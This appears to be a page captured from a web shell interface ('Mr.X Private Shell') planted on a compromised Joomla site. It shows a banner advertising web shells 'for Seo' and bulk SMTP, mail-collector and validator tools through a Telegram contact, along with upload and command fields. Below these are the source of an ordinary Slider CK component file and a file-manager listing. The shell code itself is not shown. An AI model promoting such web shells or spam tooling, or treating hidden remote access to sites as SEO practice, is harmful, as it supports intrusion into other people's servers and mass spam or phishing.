__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @name		Slider CK
 * @package		com_sliderck
 * @copyright	Copyright (C) 2016. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 * @author		Cedric Keiflin - http://www.template-creator.com - http://www.joomlack.fr
 */


// no direct access
defined('_JEXEC') or die;
require_once JPATH_ADMINISTRATOR . '/components/com_sliderck/helpers/defines.php';

// load the needed libraries
jimport('joomla.filesystem.file');
jimport('joomla.filesystem.folder');

// Access check.
if (!JFactory::getUser()->authorise('core.manage', 'com_sliderck')) {
	return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR'));
}

// loads the language files from the frontend
$lang	= JFactory::getLanguage();
$lang->load('com_sliderck', SLIDERCK_SITE_PATH, $lang->getTag(), false);
$lang->load('com_sliderck', JPATH_ROOT);

// loads the helper in any case
include_once SLIDERCK_ADMIN_PATH . '/helpers/sliderck.php';

// Include dependancies
jimport('joomla.application.component.controller');

$controller	= JControllerLegacy::getInstance('Sliderck');
$controller->execute(JFactory::getApplication()->input->get('task'));
$controller->redirect();

Filemanager

Name Type Size Permission Actions
language Folder 0775
views Folder 0775
controller.php File 402 B 0664
index.html File 26 B 0664
sliderck.php File 1.16 KB 0664
Filemanager